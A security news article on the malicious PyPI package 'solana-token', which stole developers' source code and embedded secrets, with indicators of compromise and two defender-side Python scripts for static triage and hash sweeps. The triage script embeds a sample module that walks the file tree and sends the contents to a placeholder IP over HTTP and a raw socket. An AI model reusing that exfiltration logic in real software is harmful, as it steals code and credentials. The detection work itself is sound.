A new supply chain attack has been uncovered in the Python ecosystem, as security researchers from RL identified a malicious package named solana-token on the popular PyPI repository.
The package, which masqueraded as a legitimate utility for developers working with the Solana blockchain, was downloaded over 600 times before its removal.
Solana, known for its high-performance decentralized infrastructure and the SOL cryptocurrency, continues to attract both legitimate developer interest and, as this incident demonstrates, malicious actors seeking to exploit the growing ecosystem.
Targeting Sensitive Developer Assets
The malicious solana-token package drew scrutiny due to a set of behaviors frequently linked to infostealer malware.
Among its most notable traits were hardcoded URLs referencing host machines by IP address (an obfuscation tactic to avoid detection by automated security scanners), code initiating outbound connections to non-standard network ports, and the ability to scan and read files within the execution chain.
These signifiers prompted RL’s investigation, ultimately revealing code designed to exfiltrate source files and, critically, any embedded secrets or credentials such as hardcoded crypto wallet keys.
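The three traits above (IP-literal hosts, outbound connections on non-standard ports, file enumeration and reads) can be turned into a cheap static triage pass that runs before a package is installed. The script below is an added, defender-side example and is not code from the RL report or from the solana-token package; it walks a module's AST and reports each hit with its line number. The rule names, the port allow-list, the call lists and the embedded sample module are all assumptions for illustration: the sample is constructed to mimic the described behaviour and uses the RFC 5737 documentation address 192.0.2.10 rather than any real indicator.

```python
"""Static triage of a Python source file for the infostealer traits described above.

Three heuristics, applied over the AST rather than by grepping:
  * string literals that name a host by raw IP address (bare or inside a URL)
  * outbound connections (requests/urllib/socket) and any literal port
    outside the usual 80/443
  * calls that enumerate or read files from the working tree
Every hit carries a line number so a reviewer can go straight to it.  These are
triage signals, not verdicts: a build script that reads files trips the
file-access rule as well.
"""
import ast
import ipaddress
import re
from urllib.parse import urlsplit

STANDARD_PORTS = {80, 443}                      # assumed "ordinary" ports
FILE_ACCESS_CALLS = {"open", "os.listdir", "os.walk", "os.scandir", "glob.glob"}
NETWORK_CALLS = {"requests.get", "requests.post", "urllib.request.urlopen",
                 "socket.create_connection"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

# Constructed sample module that mimics the reported behaviour.  192.0.2.10 is a
# documentation-range address (RFC 5737), not a real indicator.
SAMPLE_SOURCE = '''\
import os
import socket
import requests

C2 = "http://192.0.2.10:8083/upload"  # placeholder address, see note above

def collect():
    out = []
    for root, _dirs, files in os.walk("."):
        for name in files:
            if name.endswith(".py"):
                with open(os.path.join(root, name)) as fh:
                    out.append(fh.read())
    return out

def send(payload):
    requests.post(C2, data=payload)
    s = socket.socket()
    s.connect(("192.0.2.10", 4444))
    s.sendall(payload.encode())
'''


def _dotted_name(node):
    """'a.b.c' for Name/Attribute chains (os.walk, s.connect); None otherwise."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _is_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def _literal_port(call):
    """Port from connect((host, port)) / create_connection((host, port))."""
    if call.args and isinstance(call.args[0], ast.Tuple) and len(call.args[0].elts) == 2:
        port = call.args[0].elts[1]
        if isinstance(port, ast.Constant) and isinstance(port.value, int):
            return port.value
    return None


def scan_source(source, filename="<package>"):
    """Return a list of {'rule', 'line', 'detail'} findings for one module."""
    findings = []

    def hit(rule, node, detail):
        findings.append({"rule": rule, "line": node.lineno, "detail": detail})

    for node in ast.walk(ast.parse(source, filename=filename)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if _is_ip(node.value):                       # bare "192.0.2.10"
                hit("ip-literal-host", node, node.value)
            for url in URL_RE.findall(node.value):       # IP host inside a URL
                parts = urlsplit(url)
                if _is_ip(parts.hostname or ""):
                    hit("ip-literal-host", node, url)
                try:
                    port = parts.port
                except ValueError:
                    port = None
                if port is not None and port not in STANDARD_PORTS:
                    hit("non-standard-port", node, url)
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name is None:
                continue
            if name in FILE_ACCESS_CALLS:
                hit("file-access", node, name)
            if name in NETWORK_CALLS or name.endswith(".connect"):
                hit("outbound-connection", node, name)
                port = _literal_port(node)
                if port is not None and port not in STANDARD_PORTS:
                    hit("non-standard-port", node, f"{name} -> port {port}")
    return findings


def triage(source):
    """Count hits per rule; an empty dict means none of the heuristics fired."""
    counts = {}
    for finding in scan_source(source):
        counts[finding["rule"]] = counts.get(finding["rule"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in sorted(scan_source(SAMPLE_SOURCE), key=lambda f: f["line"]):
        print(f"line {f['line']:>3}  {f['rule']:<20} {f['detail']}")
```

Run against a package's extracted sdist, a module that fires all four rules at once deserves a manual read before anything is installed; a module firing only the file-access rule is usually a build helper and should not be blocked on that alone.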

Unlike prior attacks that primarily targeted end-user assets such as those seen in the Atomic and Exodus wallet breaches, this campaign was aimed specifically at developers.
By compromising their environments and stealing sensitive application code, attackers gain privileged access to potentially vulnerable infrastructure, making this a significant escalation in the ongoing threat against crypto-related projects.
Notably, the package implemented routines to harvest and send source code files to remote servers, a technique rarely observed in open-source malware targeting the Python ecosystem.
Persistent Name Reuse
The solana-token name was not new to PyPI; previous versions had been detected and removed from the repository.
However, the earlier takedown was actioned by the package authors, not PyPI’s security team, leaving the name available for reuse.
The reappearance of solana-token, albeit with a different versioning scheme and altered code, highlights a loophole in PyPI’s package removal policy and raises concerns about the platform’s resilience against persistent attackers.
While no definitive link has been established between previous and current operators, the pattern suggests a deliberate strategy to exploit trusted names and target developer communities repeatedly.
RL’s swift report of the latest iteration led to the permanent removal of solana-token from PyPI, which should, in theory, prevent future uploads using that name.
However, the episode underscores the ongoing threat landscape faced by software supply chains, especially in the fast-evolving cryptocurrency space where hardcoded credentials and sensitive assets frequently reside within source code.
This incident serves as a critical warning for software development teams: vigilance is essential, not only in monitoring code dependencies but in auditing package provenance and activity within development environments.
Supply chain attacks, as evidenced by solana-token, are growing increasingly sophisticated, with adversaries now targeting the tools and modules used by crypto developers as a means to gain access to broader infrastructure.
The solana-token supply chain attack is a sobering reminder of the rising risks in open-source software ecosystems and the elevated stakes for blockchain and crypto project developers worldwide.
Indicators of Compromise (IOCs)
| package_name | version | SHA1 |
|---|---|---|
| solana-token | 0.0.1 | f4e1149360174b4fcf0dcc6e61898c8180324893 |
| solana-token | 0.0.1 | 0b8697f8e81956e7c0c5383806fa69630c38ad33 |
| solana-token | 0.0.2 | e07457e36bf9aab1dc2b54acd30ec8f9e5c60c84 |
| solana-token | 0.0.2 | 9719d1e076ab67a18f231889cad4b451f539ce72 |
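The table is only useful once it is checked against what is actually on disk, for example a download cache or an internal mirror that may have fetched the package before its removal. The script below is an added example, not tooling from RL or PyPI: it parses the rows above (accepting a row only when its third cell is a 40-hex-digit digest, so the header and separator lines are skipped), hashes every sdist or wheel under a directory in a streaming fashion, and reports any file whose SHA1 matches. The directory argument, the extension list and the in-memory `match_digests` helper are assumptions for illustration.

```python
"""Sweep downloaded package artifacts for the SHA1 indicators listed above."""
import hashlib
import os
import re
import sys

# Rows copied from the IoC table in this write-up: package | version | SHA1.
IOC_TABLE = """\
package_name | version | SHA1 |
---|---|---|
solana-token | 0.0.1 | f4e1149360174b4fcf0dcc6e61898c8180324893 |
solana-token | 0.0.1 | 0b8697f8e81956e7c0c5383806fa69630c38ad33 |
solana-token | 0.0.2 | e07457e36bf9aab1dc2b54acd30ec8f9e5c60c84 |
solana-token | 0.0.2 | 9719d1e076ab67a18f231889cad4b451f539ce72 |
"""

SHA1_RE = re.compile(r"[0-9a-f]{40}")


def parse_ioc_table(text):
    """Return {sha1: (package, version)}.  Header and separator rows are
    dropped because their third cell is not a 40-hex-digit digest."""
    index = {}
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 3:
            continue
        package, version, digest = cells
        digest = digest.lower()
        if SHA1_RE.fullmatch(digest):
            index[digest] = (package, version)
    return index


IOC_INDEX = parse_ioc_table(IOC_TABLE)


def sha1_hex(data):
    """SHA1 of an in-memory blob (handy for tests and for hashing HTTP bodies)."""
    return hashlib.sha1(data).hexdigest()


def sha1_of_file(path, chunk=1 << 20):
    """Streaming SHA1 so large wheels are not read into memory at once."""
    h = hashlib.sha1()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def match_digests(digests, ioc_index=IOC_INDEX):
    """digests: {label: sha1}.  Returns [(label, package, version, sha1)] hits."""
    hits = []
    for label, digest in digests.items():
        digest = digest.lower()
        if digest in ioc_index:
            package, version = ioc_index[digest]
            hits.append((label, package, version, digest))
    return hits


def scan_directory(root, ioc_index=IOC_INDEX, extensions=(".tar.gz", ".whl", ".zip")):
    """Hash every sdist/wheel under root (assumed: a mirror or download cache)."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(extensions):
                path = os.path.join(dirpath, name)
                digests[path] = sha1_of_file(path)
    return match_digests(digests, ioc_index)


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for label, package, version, digest in scan_directory(root):
        print(f"MATCH {label}: {package}=={version} sha1={digest}")
```

A match is conclusive (the digest is of the artifact itself), but a clean sweep is not: only the four published digests are checked, so a re-upload under the same name with altered code, as this incident shows is possible, would not be caught by hash alone and still needs the name-level block on the installer side.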